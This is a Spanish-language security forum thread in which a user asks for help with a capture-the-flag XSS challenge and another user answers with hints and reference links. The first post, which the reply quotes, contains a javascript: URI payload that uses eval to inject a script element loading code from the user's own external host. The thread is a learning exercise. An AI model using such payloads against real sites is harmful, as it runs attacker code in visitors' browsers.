¿Explotar javascript?

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

27 Noviembre 2024, 01:50 am

Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)

Foro de elhacker.net

Seguridad Informática

Hacking (Moderador: toxeek)

¿Explotar javascript?

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: ¿Explotar javascript? (Leído 2,836 veces)

Sapote

Desconectado

Desconectado

Mensajes: 293

Ayuda a un nuevo y ese nuevo algun dia te ayudara

Ver Perfil

¿Explotar javascript?

« en: 10 Octubre 2019, 07:53 am »

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>

He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?

Gracias
Saludos!!


	En línea

@XSStringManolo

Hacker/Programador
Colaborador

Desconectado

Desconectado

Mensajes: 2.399

Turn off the red ligth

Ver Perfil

WWW

Re: ¿Explotar javascript?

« Respuesta #1 en: 10 Octubre 2019, 09:59 am »

Cita de: Sapote en 10 Octubre 2019, 07:53 am

Buenas tardes, hacee unos dias entre nuevamente de lleno al tema del hacking, y estoy realizando un par de retos de todo tipo. Ahorita estoy atascado en conseguir una flag.

El punto es el siguiente es un sitio que unicamente tiene un codigo javascript que regresa al mismo sitio.

El javascript es el siguiente

<a href="javascript:openNewWindow('hello.html');">Rompeme</a>

He intentado cambiar el script para intentar sacar un XSS de esta manera

<a href="javascript:eval('var a=document.createElement(\'script\');a.src=\'https://micodigo\';document.body.appendChild(a)')">Rompeme</a>

Al hacerlo obtengo un [object HTMLScriptElement] pero mi sitio no esta capturando nada.

¿Alguien podria darme una mano?

Gracias
Saludos!!

Estás intentando escribir un objeto en la web, debes escribir la url accediendo a ella (value del objeto).

De todas formas no creo que el reto busque que te lo pases así jaja. Me da a mi que el nombre de la función te está diciendo exactamente lo que quiere que hagas. Es obvio UwU. Seguro que te das cuenta:
https://excess-xss.com/
https://portswigger.net/web-security/cross-site-scripting/contexts
https://brutelogic.com.br/blog/alternative-javascript-pseudo-protocol/

Hay algo interesante, se le puede hacer return explicito al pseudoprotocolo. Lo que hace el pseudoprotocolo creo que es retornarte un objeto con la página, asique si lo haces explicitamente debería retornarte el resultado de la expresión directamente. O debería ser así por como está implementado el pseudoproto.


	En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

Mensajes similares
		Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
		Explotar Vulnerabilidades CGI Bugs y Exploits	Tracxus	5	5,008	12 Enero 2011, 21:08 pm por berz3k
		Creo que voy a explotar Redes	тαптяα	7	3,189	29 Agosto 2012, 13:54 pm por adrianmendezRap
		Explotar PHP Bugs y Exploits	DoHITB	7	5,028	7 Enero 2013, 20:39 pm por jdc

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines